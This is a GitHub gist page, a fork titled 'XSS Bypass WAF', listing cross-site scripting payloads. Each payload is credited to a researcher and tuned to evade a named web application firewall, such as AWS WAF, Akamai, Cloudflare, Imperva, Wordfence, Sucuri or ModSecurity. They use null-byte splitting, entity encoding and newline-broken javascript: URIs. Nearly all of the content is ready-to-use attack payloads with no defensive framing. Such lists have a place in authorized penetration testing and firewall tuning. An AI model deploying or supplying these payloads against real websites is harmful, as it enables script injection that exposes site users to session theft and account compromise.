Skip to content

Instantly share code, notes, and snippets.

@CodeAdminDe

CodeAdminDe/xss-bypass-waf

Forked from zetc0de/xss-bypass-waf
Created August 18, 2022 12:47
Show Gist options
  • Save CodeAdminDe/77c9bb2366bc99245c7a6c5f8ebab8a9 to your computer and use it in GitHub Desktop.
Save CodeAdminDe/77c9bb2366bc99245c7a6c5f8ebab8a9 to your computer and use it in GitHub Desktop.
Download ZIP
XSS Bypass WAF
Raw
xss-bypass-waf
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.
@daveysec | Was able to bypass Imperva Incapsula WAF with:
<svg onload\r\n=$.globalEval("al"+"ert()");>
@rodolfoassis | Wordfence 7.4.2
<a href=&#01javascript:alert(1)>
rodolfoassis | Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>
rodolfoassis | ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment